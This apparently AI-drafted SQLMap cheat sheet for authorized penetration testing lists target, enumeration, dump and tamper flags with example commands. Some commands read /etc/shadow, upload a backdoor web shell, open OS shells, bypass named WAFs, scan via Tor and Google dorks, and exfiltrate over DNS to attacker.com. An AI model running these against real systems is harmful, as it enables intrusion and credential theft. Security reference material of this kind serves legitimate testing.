sqlmap.md (29644B)
1 --- 2 title: "SQLMap" 3 description: "SQLMap automated SQL injection: target flags, techniques, enumeration, dumping and tamper scripts." 4 category: exploitation 5 tags: [exploitation, sql-injection, web] 6 tools: [SQLMap] 7 difficulty: intermediate 8 updated: "2026-08-09" 9 source: "vault:Exploitation/sqlmap.md" 10 --- 11 12 # SQLMap 13 14 I'll conduct deep research to compile the ultimate SQLMap cheat sheet. Let me systematically gather comprehensive information on all aspects of SQLMap. 15 16 # Ultimate SQLMap Cheat Sheet 17 18 > **⚠️ LEGAL DISCLAIMER**: This cheat sheet is intended exclusively for authorized penetration testing and security assessments. Unauthorized access to computer systems is illegal. Always obtain explicit written permission before conducting security testing. The author assumes no liability for misuse. 19 20 --- 21 22 ## 1. Target Specification & Request Handling 23 24 ### Basic Target Specification 25 26 | Flag/Command | Description | Example Usage | 27 |:---|:---|:---| 28 | `-u URL` | Target URL with injectable parameter | `sqlmap -u "http://site.com/page.php?id=1"` | 29 | `-d DSN` | Direct database connection string | `sqlmap -d "mysql://user:pass@localhost:3306/db"` | 30 | `-r FILE` | Load HTTP request from file (Burp/ZAP export) | `sqlmap -r request.txt` | 31 | `-l FILE` | Parse targets from Burp/WebScarab proxy log | `sqlmap -l burp_log.xml` | 32 | `-g DORK` | Process Google dork results as targets | `sqlmap -g "inurl:'.php?id='"` | 33 | `-m FILE` | Scan multiple targets from text file | `sqlmap -m targets.txt` | 34 35 ### Crawling & Discovery 36 37 | Flag/Command | Description | Example Usage | 38 |:---|:---|:---| 39 | `--crawl=DEPTH` | Crawl website from target URL (finds GET params only) | `sqlmap -u "http://site.com" --crawl=3` | 40 | `--crawl-exclude` | Exclude pages matching regex during crawl | `sqlmap --crawl=2 --crawl-exclude="logout"` | 41 | `-x FILE` | Parse and test URLs from XML sitemap | `sqlmap -x http://site.com/sitemap.xml` | 42 | `--forms` | Parse and test HTML forms on target page | `sqlmap -u "http://site.com/login.php" --forms` | 43 44 ### Request Customization 45 46 | Flag/Command | Description | Example Usage | 47 |:---|:---|:---| 48 | `--data=DATA` | POST data string (use with `-u`) | `sqlmap -u "http://site.com/login" --data="user=admin&pass=test"` | 49 | `--method=METHOD` | Force HTTP method (GET/POST/PUT/DELETE/PATCH) | `sqlmap -u "http://site.com/api" --method=PUT` | 50 | `--cookie=COOKIE` | HTTP Cookie header value | `sqlmap -u "http://site.com" --cookie="PHPSESSID=abc123"` | 51 | `--headers=HEADERS` | Extra headers (newline-separated) | `sqlmap -u URL --headers="X-Forwarded-For: 1.2.3.4\nAccept: */*"` | 52 | `--referer=REFERER` | HTTP Referer header | `sqlmap -u URL --referer="http://google.com"` | 53 | `--user-agent=UA` | Custom User-Agent | `sqlmap -u URL --user-agent="Mozilla/5.0..."` | 54 | `--random-agent` | Use randomly selected User-Agent | `sqlmap -u URL --random-agent` | 55 | `--mobile` | Imitate smartphone User-Agent | `sqlmap -u URL --mobile` | 56 | `--host=HOST` | Custom HTTP Host header | `sqlmap -u URL --host="target.local"` | 57 58 ### Authentication 59 60 | Flag/Command | Description | Example Usage | 61 |:---|:---|:---| 62 | `--auth-type=TYPE` | HTTP authentication (Basic/Digest/NTLM/PKI) | `sqlmap -u URL --auth-type=Basic --auth-cred="user:pass"` | 63 | `--auth-cred=CRED` | Authentication credentials (username:password) | `sqlmap -u URL --auth-type=Digest --auth-cred="admin:secret"` | 64 | `--auth-file=FILE` | HTTP authentication PEM cert/private key file | `sqlmap -u URL --auth-type=PKI --auth-file=key.pem` | 65 66 ### Custom Injection Points 67 68 | Flag/Command | Description | Example Usage | 69 |:---|:---|:---| 70 | `-p PARAMETER` | Testable parameter(s) | `sqlmap -u URL -p "id,user"` | 71 | `--skip=PARAM` | Skip testing specific parameters | `sqlmap -u URL --skip="csrf_token"` | 72 | `--param-exclude` | Exclude parameters by regex | `sqlmap -u URL --param-exclude="token.*"` | 73 | `*` (marker) | Mark custom injection point in URL or data | `sqlmap -u "http://site.com/page?id=1*&user=admin"` | 74 75 **Example: Testing POST Request from Burp Suite** 76 ```bash 77 # Save Burp request to request.txt, then: 78 sqlmap -r request.txt --batch --level=3 --risk=2 79 ``` 80 81 --- 82 83 ## 2. Optimization & Performance 84 85 ### Multithreading & Speed 86 87 | Flag/Command | Description | Example Usage | 88 |:---|:---|:---| 89 | `--threads=NUM` | Max number of concurrent HTTP requests (default 1, max 10) | `sqlmap -u URL --threads=5` | 90 | `-o` | Enable all optimization switches | `sqlmap -u URL -o --threads=5` | 91 | `--predict-output` | Predict common queries output (cannot use with `--threads`) | `sqlmap -u URL --predict-output` | 92 93 ### Connection Optimization 94 95 | Flag/Command | Description | Example Usage | 96 |:---|:---|:---| 97 | `--keep-alive` | Use persistent HTTP(s) connections | `sqlmap -u URL --keep-alive` | 98 | `--null-connection` | Retrieve page length without actual content (faster) | `sqlmap -u URL --null-connection` | 99 | `--timeout=SECS` | Seconds to wait before connection timeout (default 30) | `sqlmap -u URL --timeout=10` | 100 | `--retries=NUM` | Retries when connection timeout occurs (default 3) | `sqlmap -u URL --retries=5` | 101 | `--delay=SECS` | Delay in seconds between each HTTP request | `sqlmap -u URL --delay=2` | 102 103 ### Session Management 104 105 | Flag/Command | Description | Example Usage | 106 |:---|:---|:---| 107 | `--flush-session` | Permanently delete session data for current target | `sqlmap -u URL --flush-session` | 108 | `--fresh-queries` | Ignore session file data (don't delete, just skip) | `sqlmap -u URL --fresh-queries` | 109 | `--purge` | Safely remove all content from sqlmap data directory | `sqlmap --purge` | 110 111 **Performance Optimization Example:** 112 ```bash 113 # Fast scan with optimizations 114 sqlmap -u "http://site.com/page?id=1" -o --threads=10 --keep-alive --batch 115 ``` 116 117 --- 118 119 ## 3. Injection Techniques & Detection 120 121 ### Technique Selection 122 123 | Code | Technique | Description | 124 |:---|:---|:---| 125 | `B` | Boolean-based blind | True/False logic to infer data | 126 | `E` | Error-based | Extract data from DBMS error messages | 127 | `U` | UNION query-based | Append UNION SELECT to retrieve data directly | 128 | `S` | Stacked queries | Execute additional SQL statements (required for command execution) | 129 | `T` | Time-based blind | Use database time delays to infer data | 130 | `Q` | Inline queries | Inline query injection (rare) | 131 132 | Flag/Command | Description | Example Usage | 133 |:---|:---|:---| 134 | `--technique=TECH` | SQL injection techniques to test (default: BEUSTQ) | `sqlmap -u URL --technique=BEUS` (skip time-based) | 135 | `--time-sec=SECS` | Seconds to delay for time-based blind (default 5) | `sqlmap -u URL --time-sec=10` | 136 137 ### Risk & Level Configuration 138 139 | Flag/Command | Description | Example Usage | 140 |:---|:---|:---| 141 | `--level=LEVEL` | Test depth (1-5, default 1). Level 2+ tests cookies, Level 3+ tests User-Agent/Referer | `sqlmap -u URL --level=5` | 142 | `--risk=RISK` | Risk of tests (1-3, default 1). Higher includes OR-based and heavy queries | `sqlmap -u URL --risk=3` | 143 144 **Level Details:** 145 * **Level 1**: Basic GET/POST parameters 146 * **Level 2**: Adds HTTP Cookie values 147 * **Level 3**: Adds User-Agent and Referer headers 148 * **Level 4**: More extensive test coverage 149 * **Level 5**: Maximal test coverage (slowest) 150 151 **Risk Details:** 152 * **Risk 1**: Safe tests only 153 * **Risk 2**: Adds heavy time-based queries 154 * **Risk 3**: Adds OR-based injection (may UPDATE/DELETE data) 155 156 ### DBMS Specification 157 158 | Flag/Command | Description | Example Usage | 159 |:---|:---|:---| 160 | `--dbms=DBMS` | Force backend DBMS (MySQL, Oracle, PostgreSQL, MSSQL, etc.) | `sqlmap -u URL --dbms=MySQL` | 161 | `--os=OS` | Force backend OS (Linux, Windows) | `sqlmap -u URL --os=Linux` | 162 | `--fingerprint` | Extensive DBMS version fingerprinting | `sqlmap -u URL --fingerprint` | 163 | `--banner` | Retrieve DBMS banner | `sqlmap -u URL --banner` | 164 165 ### UNION-Specific Flags 166 167 | Flag/Command | Description | Example Usage | 168 |:---|:---|:---| 169 | `--union-cols=RANGE` | Range of columns to test in UNION (e.g., 1-20) | `sqlmap -u URL --union-cols=5-15` | 170 | `--union-char=CHAR` | Character to use for bruteforcing column numbers | `sqlmap -u URL --union-char=GH` | 171 | `--union-from=TABLE` | Table name to use in FROM clause of UNION | `sqlmap -u URL --union-from=users` | 172 173 ### Detection Methods 174 175 | Flag/Command | Description | Example Usage | 176 |:---|:---|:---| 177 | `--string=STRING` | String to match when query is TRUE | `sqlmap -u URL --string="Welcome"` | 178 | `--not-string=STRING` | String to match when query is FALSE | `sqlmap -u URL --not-string="Invalid"` | 179 | `--regexp=REGEXP` | Regexp to match when query is TRUE | `sqlmap -u URL --regexp="user.*found"` | 180 | `--code=CODE` | HTTP code to match when query is TRUE | `sqlmap -u URL --code=200` | 181 | `--text-only` | Compare pages based on text content only | `sqlmap -u URL --text-only` | 182 | `--titles` | Compare pages based on title only | `sqlmap -u URL --titles` | 183 184 **Example: Aggressive Testing** 185 ```bash 186 sqlmap -u "http://site.com/page?id=1" --level=5 --risk=3 --technique=BEUST --batch 187 ``` 188 189 --- 190 191 ## 4. Enumeration (The "Takeover" Phase) 192 193 ### Database & User Information 194 195 | Flag/Command | Description | Example Usage | 196 |:---|:---|:---| 197 | `--current-user` | Retrieve DBMS current user | `sqlmap -u URL --current-user` | 198 | `--current-db` | Retrieve DBMS current database | `sqlmap -u URL --current-db` | 199 | `--hostname` | Retrieve server hostname | `sqlmap -u URL --hostname` | 200 | `--is-dba` | Detect if current user is DBA | `sqlmap -u URL --is-dba` | 201 | `--users` | Enumerate DBMS users | `sqlmap -u URL --users` | 202 | `--passwords` | Enumerate user password hashes (attempts to crack) | `sqlmap -u URL --passwords` | 203 | `--privileges` | Enumerate user privileges | `sqlmap -u URL --privileges` | 204 | `--roles` | Enumerate user roles | `sqlmap -u URL --roles` | 205 206 ### Database Enumeration 207 208 | Flag/Command | Description | Example Usage | 209 |:---|:---|:---| 210 | `--dbs` | List all databases | `sqlmap -u URL --dbs` | 211 | `-D DATABASE` | Specify target database | `sqlmap -u URL -D testdb --tables` | 212 | `--tables` | List tables in database(s) | `sqlmap -u URL -D testdb --tables` | 213 | `-T TABLE` | Specify target table | `sqlmap -u URL -D testdb -T users --columns` | 214 | `--columns` | List columns in table(s) | `sqlmap -u URL -D testdb -T users --columns` | 215 | `-C COLUMN` | Specify target column(s) | `sqlmap -u URL -D testdb -T users -C username,password --dump` | 216 | `--schema` | Enumerate entire DBMS schema | `sqlmap -u URL --schema` | 217 | `--count` | Retrieve number of entries in table(s) | `sqlmap -u URL -D testdb -T users --count` | 218 219 ### Data Extraction 220 221 | Flag/Command | Description | Example Usage | 222 |:---|:---|:---| 223 | `--dump` | Dump table entries | `sqlmap -u URL -D testdb -T users --dump` | 224 | `--dump-all` | Dump all DBMS databases tables | `sqlmap -u URL --dump-all` | 225 | `--exclude-sysdbs` | Exclude system databases during enumeration | `sqlmap -u URL --dump-all --exclude-sysdbs` | 226 | `--start=ROW` | First dump table entry to retrieve | `sqlmap -u URL -D testdb -T users --start=50 --stop=100 --dump` | 227 | `--stop=ROW` | Last dump table entry to retrieve | `sqlmap -u URL -D testdb -T users --start=1 --stop=10 --dump` | 228 | `--where=CLAUSE` | Use WHERE condition during table dump | `sqlmap -u URL -D testdb -T users --dump --where="id>100"` | 229 | `--pivot-column=COL` | Use pivot column name for unique row identifiers | `sqlmap -u URL --dump --pivot-column=id` | 230 231 ### Search Functions 232 233 | Flag/Command | Description | Example Usage | 234 |:---|:---|:---| 235 | `--search` | Search for databases, tables, or columns | `sqlmap -u URL --search -C password` | 236 | `-C COLUMN` | Search for column name(s) | `sqlmap -u URL --search -C "user,pass"` | 237 | `-T TABLE` | Search for table name(s) | `sqlmap -u URL --search -T "admin"` | 238 | `-D DATABASE` | Search for database name(s) | `sqlmap -u URL --search -D "prod"` | 239 240 ### Direct SQL Execution 241 242 | Flag/Command | Description | Example Usage | 243 |:---|:---|:---| 244 | `--sql-query=QUERY` | Execute custom SQL statement | `sqlmap -u URL --sql-query="SELECT user()"` | 245 | `--sql-shell` | Interactive SQL shell | `sqlmap -u URL --sql-shell` | 246 | `--sql-file=FILE` | Execute SQL statements from file | `sqlmap -u URL --sql-file=queries.sql` | 247 248 ### Brute Force Discovery 249 250 | Flag/Command | Description | Example Usage | 251 |:---|:---|:---| 252 | `--common-tables` | Check existence of common table names | `sqlmap -u URL --common-tables` | 253 | `--common-columns` | Check existence of common column names | `sqlmap -u URL -D testdb -T users --common-columns` | 254 255 ### Complete Enumeration Example 256 ```bash 257 # Enumerate everything 258 sqlmap -u "http://site.com/page?id=1" -a --batch 259 260 # Target specific database and table 261 sqlmap -u URL --batch --dbs 262 sqlmap -u URL --batch -D webapp -T users --columns 263 sqlmap -u URL --batch -D webapp -T users -C id,username,password --dump 264 ``` 265 266 **Output Formats:** 267 268 | Flag/Command | Description | Example Usage | 269 |:---|:---|:---| 270 | `--dump-format=FORMAT` | Dump data format (CSV, HTML, SQLITE) | `sqlmap -u URL --dump --dump-format=HTML` | 271 | `--csv-del=CHAR` | CSV delimiter character (default `,`) | `sqlmap -u URL --dump --csv-del=";"` | 272 273 --- 274 275 ## 5. System Access & File System 276 277 ### File System Operations 278 279 | Flag/Command | Description | Example Usage | 280 |:---|:---|:---| 281 | `--file-read=FILE` | Read file from the DBMS file system | `sqlmap -u URL --file-read="/etc/passwd"` | 282 | `--file-write=LOCAL` | Local file to write to backend DBMS | `sqlmap -u URL --file-write="shell.php" --file-dest="/var/www/html/shell.php"` | 283 | `--file-dest=REMOTE` | Absolute path to write file on backend | See above example | 284 285 **Note:** File operations typically require DBA privileges and `LOAD_FILE()` (MySQL) or similar functions. 286 287 ### OS Command Execution 288 289 | Flag/Command | Description | Example Usage | 290 |:---|:---|:---| 291 | `--os-cmd=CMD` | Execute single operating system command | `sqlmap -u URL --os-cmd="whoami"` | 292 | `--os-shell` | Interactive operating system shell (requires stacked queries) | `sqlmap -u URL --os-shell` | 293 | `--os-pwn` | Prompt for OOB Meterpreter/VNC shell (requires stacked queries) | `sqlmap -u URL --os-pwn --msf-path="/opt/metasploit"` | 294 | `--msf-path=PATH` | Path to Metasploit Framework installation | See above example | 295 | `--priv-esc` | Database process user privilege escalation | `sqlmap -u URL --priv-esc` | 296 297 **Requirements for OS Takeover:** 298 * Stacked queries support (`S` technique) 299 * DBA privileges (usually) 300 * File write permissions on web directory or xp_cmdshell (MSSQL) 301 302 ### Windows Registry Access 303 304 **Note:** Works with MySQL (via UDF), PostgreSQL, and MSSQL when stacked queries are supported. 305 306 | Flag/Command | Description | Example Usage | 307 |:---|:---|:---| 308 | `--reg-read` | Read Windows registry key value | `sqlmap -u URL --reg-read --reg-key="HKLM\Software\..." --reg-value="Version"` | 309 | `--reg-add` | Write Windows registry key value | `sqlmap -u URL --reg-add --reg-key="HKLM\..." --reg-value="Test" --reg-data="123" --reg-type=REG_SZ` | 310 | `--reg-del` | Delete Windows registry key value | `sqlmap -u URL --reg-del --reg-key="HKLM\..." --reg-value="Test"` | 311 | `--reg-key=KEY` | Registry key path | See examples above | 312 | `--reg-value=VALUE` | Registry key value name | See examples above | 313 | `--reg-data=DATA` | Registry key value data | See examples above | 314 | `--reg-type=TYPE` | Registry key value type (REG_SZ, REG_DWORD, etc.) | See examples above | 315 316 ### UDF Injection 317 318 | Flag/Command | Description | Example Usage | 319 |:---|:---|:---| 320 | `--udf-inject` | Inject custom user-defined functions | `sqlmap -u URL --udf-inject` | 321 322 ### File System Takeover Example 323 ```bash 324 # Read sensitive file 325 sqlmap -u "http://site.com/page?id=1" --file-read="/etc/shadow" --batch 326 327 # Upload web shell 328 sqlmap -u URL --file-write="shell.php" --file-dest="/var/www/html/backdoor.php" --batch 329 330 # Get OS shell 331 sqlmap -u URL --os-shell --batch 332 # Then execute: whoami, id, uname -a 333 ``` 334 335 --- 336 337 ## 6. WAF Bypass & Tamper Scripts 338 339 ### WAF Detection 340 341 | Flag/Command | Description | Example Usage | 342 |:---|:---|:---| 343 | `--check-waf` | Check for WAF/IPS protection | `sqlmap -u URL --check-waf` | 344 | `--skip-waf` | Skip WAF/IPS detection mechanism | `sqlmap -u URL --skip-waf` | 345 346 ### Tamper Script Usage 347 348 | Flag/Command | Description | Example Usage | 349 |:---|:---|:---| 350 | `--tamper=SCRIPT` | Use tamper script(s) to modify injection payloads | `sqlmap -u URL --tamper=space2comment` | 351 | Multiple tampers | Chain multiple tampers (comma-separated) | `sqlmap -u URL --tamper=between,randomcase,space2comment` | 352 353 ### Top 10 Tamper Scripts 354 355 | Tamper Script | Description | Use Case | Example Transformation | 356 |:---|:---|:---|:---| 357 | `space2comment` | Replaces space with `/**/` | Bypass basic space filtering, general WAF evasion | `SELECT id FROM users` → `SELECT/**/id/**/FROM/**/users` | 358 | `between` | Replaces `>` with `NOT BETWEEN 0 AND #`, `=` with `BETWEEN # AND #` | Bypass operator blocking (CloudFlare, ModSecurity) | `id=1` → `id BETWEEN 1 AND 1` | 359 | `randomcase` | Randomizes character case in keywords | Bypass case-sensitive filters | `SELECT` → `SeLeCt` | 360 | `charencode` | URL-encodes all payload characters | Bypass basic signature detection | `' OR 1=1` → `%27%20%4F%52%20%31%3D%31` | 361 | `apostrophenullencode` | Replaces apostrophe with `%00%27` | Bypass magic_quotes and basic escaping | `'` → `%00%27` | 362 | `base64encode` | Base64 encodes entire payload (requires DBMS support for decoding) | Advanced evasion for intelligent WAFs | `UNION SELECT` → `VU5JT04gU0VMRUNUA==` | 363 | `unmagicquotes` | Replaces quote with multibyte combo `%bf%27` | Bypass magic_quotes in PHP/MySQL (GBK charset required) | `'` → `%bf%27` | 364 | `space2plus` | Replaces space with `+` | Basic WAF evasion, URL encoding normalization | `SELECT id` → `SELECT+id` | 365 | `apostrophemask` | Replaces apostrophe with UTF-8 full-width equivalent | Bypass basic apostrophe filtering | `'` → `'` | 366 | `securesphere` | Specific tamper for Imperva SecureSphere WAF | Known Imperva bypasses | Adds special chars/comments | 367 368 ### DBMS-Specific Tampers 369 370 #### MySQL Tampers 371 372 | Tamper Script | Description | Example | 373 |:---|:---|:---| 374 | `space2mysqldash` | Replace space with `--` followed by newline | `SELECT id` → `SELECT--[\n]id` | 375 | `space2hash` | Replace space with `#` followed by random string and newline | `SELECT id` → `SELECT#foo[\n]id` | 376 | `versionedkeywords` | Enclose each keyword with MySQL version comment | `UNION SELECT` → `/*!UNION*//*!SELECT*/` | 377 | `versionedmorekeywords` | Version comments around more keywords | Extended version of above | 378 379 #### MSSQL Tampers 380 381 | Tamper Script | Description | Example | 382 |:---|:---|:---| 383 | `space2mssqlblank` | Replace space with random blank character from valid MSSQL set | Uses `%01-%08`, `%0B`, etc. | 384 | `space2dash` | Replace space with `--` followed by random string | `SELECT id` → `SELECT--foo[\n]id` | 385 386 #### ModSecurity Tampers 387 388 | Tamper Script | Description | Example | 389 |:---|:---|:---| 390 | `modsecurityversioned` | Embraces query with versioned comment | `1 AND 1=1` → `1 /*!30000AND 1=1*/` | 391 | `modsecurityzeroversioned` | Embraces query with zero-versioned comment | `1 AND 1=1` → `1 /*!00000AND 1=1*/` | 392 393 ### General Purpose Tampers 394 395 | Tamper Script | Description | Use Case | 396 |:---|:---|:---| 397 | `equaltolike` | Replaces `=` with `LIKE` | Bypass `=` operator filtering | 398 | `greatest` | Replaces `>` with `GREATEST` function | Bypass comparison operator blocking | 399 | `multiplespaces` | Adds multiple spaces around SQL keywords | Confuse signature-based detection | 400 | `nonrecursivereplacement` | Replace keywords with double representation | Bypass filters using `.replace()` once (e.g., `SESELECTLECT` → `SELECT`) | 401 402 ### WAF Bypass Strategy Examples 403 404 **Cloudflare Bypass:** 405 ```bash 406 sqlmap -u URL --tamper=between,randomcase,space2comment --random-agent --delay=2 407 ``` 408 409 **ModSecurity Bypass:** 410 ```bash 411 sqlmap -u URL --tamper=modsecurityversioned,space2comment,between --level=5 --risk=3 412 ``` 413 414 **Generic WAF Bypass with Tor:** 415 ```bash 416 sqlmap -u URL --tamper=apostrophemask,between,charencode,randomcase --tor --tor-type=SOCKS5 --check-tor --random-agent 417 ``` 418 419 **Imperva SecureSphere Bypass:** 420 ```bash 421 sqlmap -u URL --tamper=securesphere,space2comment --random-agent 422 ``` 423 424 **MySQL with magic_quotes:** 425 ```bash 426 sqlmap -u URL --tamper=unmagicquotes --dbms=MySQL 427 ``` 428 429 --- 430 431 ## 7. Advanced/Obscure Features 432 433 ### Proxy & Anonymity 434 435 | Flag/Command | Description | Example Usage | 436 |:---|:---|:---| 437 | `--proxy=PROXY` | Use HTTP/SOCKS proxy (http://ip:port or socks5://ip:port) | `sqlmap -u URL --proxy="http://127.0.0.1:8080"` | 438 | `--proxy-cred=CRED` | Proxy authentication credentials | `sqlmap -u URL --proxy=URL --proxy-cred="user:pass"` | 439 | `--proxy-file=FILE` | Load proxy list from file | `sqlmap -u URL --proxy-file=proxies.txt` | 440 | `--ignore-proxy` | Ignore system default proxy settings | `sqlmap -u URL --ignore-proxy` | 441 | `--tor` | Use Tor anonymity network | `sqlmap -u URL --tor --tor-port=9050` | 442 | `--tor-port=PORT` | Set Tor proxy port (default 8118) | See above | 443 | `--tor-type=TYPE` | Tor proxy type (HTTP, SOCKS4, SOCKS5 - default SOCKS5) | `sqlmap -u URL --tor --tor-type=SOCKS5` | 444 | `--check-tor` | Check if Tor is used properly | `sqlmap -u URL --tor --check-tor` | 445 446 ### DNS Exfiltration 447 448 | Flag/Command | Description | Example Usage | 449 |:---|:---|:---| 450 | `--dns-domain=DOMAIN` | Use DNS exfiltration attack (out-of-band technique) | `sqlmap -u URL --dns-domain="attacker.com"` | 451 452 **Requires:** A DNS server under your control to capture subdomain queries containing exfiltrated data. 453 454 ### Second-Order Injection 455 456 | Flag/Command | Description | Example Usage | 457 |:---|:---|:---| 458 | `--second-url=URL` | Target URL for second-order response | `sqlmap -u "http://site.com/post" --second-url="http://site.com/profile"` | 459 | `--second-req=FILE` | Load second-order HTTP request from file | `sqlmap -u URL --second-req=second.txt` | 460 461 **Use Case:** Inject payload on one page (e.g., registration), effect appears on another (e.g., profile page). 462 463 ### Custom Payload Manipulation 464 465 | Flag/Command | Description | Example Usage | 466 |:---|:---|:---| 467 | `--eval=CODE` | Evaluate provided Python code before each request | `sqlmap -u URL --eval="import hashlib; hash=hashlib.md5(id).hexdigest()"` | 468 | `--skip-urlencode` | Skip URL encoding of payload data | `sqlmap -u URL --skip-urlencode` | 469 470 **--eval Use Case:** Generate dynamic tokens or hashes required by the application for each request. 471 472 ### HTTP Parameter Pollution (HPP) 473 474 | Flag/Command | Description | Example Usage | 475 |:---|:---|:---| 476 | `--hpp` | Use HTTP Parameter Pollution technique | `sqlmap -u URL --hpp` | 477 478 Sends same parameter multiple times (e.g., `?id=1&id=2`). Different servers parse this differently. 479 480 ### Chunked Transfer Encoding 481 482 | Flag/Command | Description | Example Usage | 483 |:---|:---|:---| 484 | `--chunked` | Use HTTP chunked transfer encoded POST requests | `sqlmap -u URL --data="..." --chunked` | 485 486 **Use Case:** Bypass WAFs that don't properly handle chunked encoding. 487 488 ### CSRF Token Handling 489 490 | Flag/Command | Description | Example Usage | 491 |:---|:---|:---| 492 | `--csrf-token=TOKEN` | Parameter name holding anti-CSRF token | `sqlmap -u URL --data="..." --csrf-token="csrf_token"` | 493 | `--csrf-url=URL` | URL to extract anti-CSRF token from | `sqlmap -u URL --csrf-token="token" --csrf-url="http://site.com/form"` | 494 | `--csrf-method=METHOD` | HTTP method to use for CSRF token page | `sqlmap -u URL --csrf-token="token" --csrf-method=GET` | 495 496 SQLMap will automatically extract and include the CSRF token in each request. 497 498 ### Safe URL Visits 499 500 | Flag/Command | Description | Example Usage | 501 |:---|:---|:---| 502 | `--safe-url=URL` | Regularly visit this URL during testing | `sqlmap -u URL --safe-url="http://site.com/keepalive"` | 503 | `--safe-freq=NUM` | Test requests between visits to safe URL | `sqlmap -u URL --safe-url=URL --safe-freq=5` | 504 505 **Use Case:** Keep session alive or bypass rate limiting by visiting benign pages periodically. 506 507 ### Scope Control 508 509 | Flag/Command | Description | Example Usage | 510 |:---|:---|:---| 511 | `--scope=REGEX` | Filter targets from proxy log by regex | `sqlmap -l burp.log --scope=".*\.target\.com.*"` | 512 | `--test-filter=FILTER` | Filter tests by payloads/titles | `sqlmap -u URL --test-filter="ROW"` | 513 | `--test-skip=FILTER` | Skip tests by payloads/titles | `sqlmap -u URL --test-skip="BENCHMARK"` | 514 515 ### Output & Logging 516 517 | Flag/Command | Description | Example Usage | 518 |:---|:---|:---| 519 | `--output-dir=DIR` | Custom output directory path | `sqlmap -u URL --output-dir="/tmp/scan"` | 520 | `-t FILE` | Log all HTTP traffic to text file | `sqlmap -u URL -t traffic.log` | 521 | `--traffic-file=FILE` | Alternative syntax for traffic logging | `sqlmap -u URL --traffic-file=http.log` | 522 | `--har=FILE` | Log all HTTP traffic to HAR file | `sqlmap -u URL --har=traffic.har` | 523 | `--batch` | Never ask for user input (use defaults) | `sqlmap -u URL --batch` | 524 | `--answers=ANSWERS` | Set predefined answers (e.g., crack=N) | `sqlmap -u URL --answers="crack=N,follow=N"` | 525 526 ### Verbosity & Debugging 527 528 | Flag/Command | Description | Example Usage | 529 |:---|:---|:---| 530 | `-v LEVEL` | Verbosity level (0-6, default 1) | `sqlmap -u URL -v 3` | 531 | `--parse-errors` | Parse and display DBMS error messages | `sqlmap -u URL --parse-errors` | 532 | `--wizard` | Interactive wizard mode for beginners | `sqlmap --wizard` | 533 | `--beep` | Beep on question/injection found | `sqlmap -u URL --beep` | 534 | `--alert=CMD` | Run OS command when injection found | `sqlmap -u URL --alert="notify-send 'Found!'"` | 535 536 **Verbosity Levels:** 537 * **0**: Show only errors and critical messages 538 * **1** (default): Info, warnings, errors, critical 539 * **2**: Add debug messages 540 * **3**: Show payloads being sent 541 * **4**: Show HTTP requests 542 * **5**: Show HTTP response headers 543 * **6**: Show HTTP response content (full) 544 545 ### Maintenance 546 547 | Flag/Command | Description | Example Usage | 548 |:---|:---|:---| 549 | `--update` | Update SQLMap to latest development version | `sqlmap --update` | 550 | `--dependencies` | Check for missing dependencies | `sqlmap --dependencies` | 551 552 ### Miscellaneous Advanced Flags 553 554 | Flag/Command | Description | Example Usage | 555 |:---|:---|:---| 556 | `--invalid-bignum` | Use big numbers for invalidating parameter values | `sqlmap -u URL --invalid-bignum` | 557 | `--invalid-logical` | Use logical operations for invalidating values | `sqlmap -u URL --invalid-logical` | 558 | `--common-files` | Check for common files on DBMS file system | `sqlmap -u URL --common-files` | 559 | `-a` / `--all` | Retrieve everything (banner, users, db, tables, columns, dump) | `sqlmap -u URL -a --batch` | 560 561 --- 562 563 ## Practical Workflow Examples 564 565 ### 1. Quick Vulnerability Assessment 566 ```bash 567 sqlmap -u "http://target.com/page?id=1" --batch --level=3 --risk=2 --dbs 568 ``` 569 570 ### 2. Authenticated POST Request Testing 571 ```bash 572 # Capture request in Burp, save to req.txt 573 sqlmap -r req.txt --batch --level=2 --current-db --tables 574 ``` 575 576 ### 3. Dump Specific Table with WAF Bypass 577 ```bash 578 sqlmap -u URL -D webapp -T users -C username,password,email --dump \ 579 --tamper=between,randomcase,space2comment \ 580 --random-agent \ 581 --threads=5 \ 582 --batch 583 ``` 584 585 ### 4. OS Shell Access 586 ```bash 587 sqlmap -u URL --batch --level=3 --risk=3 --os-shell 588 # Requires: stacked queries support, DBA privileges 589 ``` 590 591 ### 5. Tor + Tamper + Slow Scan (Stealth) 592 ```bash 593 sqlmap -u URL \ 594 --tor --tor-type=SOCKS5 --check-tor \ 595 --tamper=space2comment,randomcase \ 596 --random-agent \ 597 --delay=3 \ 598 --level=3 \ 599 --batch 600 ``` 601 602 ### 6. Complete Enumeration with Output 603 ```bash 604 sqlmap -u URL -a \ 605 --dump-all \ 606 --exclude-sysdbs \ 607 --output-dir=/tmp/sqlmap_results \ 608 --dump-format=CSV \ 609 --batch 610 ``` 611 612 ### 7. Google Dork Mass Scanning 613 ```bash 614 sqlmap -g "inurl:'.php?id=' site:target.com" \ 615 --batch \ 616 --level=2 \ 617 --threads=5 \ 618 --dbs 619 ``` 620 621 ### 8. Second-Order Injection 622 ```bash 623 # Inject payload on registration page, check profile page for effect 624 sqlmap -u "http://site.com/register" \ 625 --data="username=test&email=test@test.com" \ 626 --second-url="http://site.com/profile" \ 627 --batch 628 ``` 629 630 ### 9. CSRF Token Handling + Auth 631 ```bash 632 sqlmap -u "http://site.com/search" \ 633 --cookie="PHPSESSID=abc123" \ 634 --data="q=test&csrf=placeholder" \ 635 --csrf-token="csrf" \ 636 --csrf-url="http://site.com/search" \ 637 --batch 638 ``` 639 640 ### 10. DNS Exfiltration (Blind + Firewall Bypass) 641 ```bash 642 sqlmap -u URL --dns-domain="attacker.com" --batch 643 # Requires: DNS server under your control listening for subdomain queries 644 ``` 645 646 --- 647 648 ## Quick Reference: Common DBMS Injection Spots 649 650 | DBMS | Key Functions | File Read | File Write | Command Exec | 651 |:---|:---|:---|:---|:---| 652 | **MySQL** | `LOAD_FILE()`, `INTO OUTFILE` | ✓ | ✓ (requires perms) | Via UDF (DBA only) | 653 | **MSSQL** | `xp_cmdshell`, `OPENROWSET` | ✓ (`BULK INSERT`) | ✓ | ✓ (via `xp_cmdshell`) | 654 | **PostgreSQL** | `COPY`, `pg_read_file()` | ✓ | ✓ | ✓ (via `COPY TO PROGRAM`) | 655 | **Oracle** | `UTL_FILE`, `DBMS_LOB` | ✓ (DBA) | ✓ (DBA) | Via Java stored procedures (DBA) | 656 | **SQLite** | `load_extension()` | ✗ (limited) | ✗ (limited) | Via custom extension (rare) | 657 658 --- 659 660 ## Final Notes 661 662 * **Always test in authorized environments only.** 663 * Combine flags intelligently: high `--level`/`--risk` with `--threads` can overwhelm servers. 664 * Use `--batch` for automated scans; remove for manual control. 665 * When WAF detected, chain 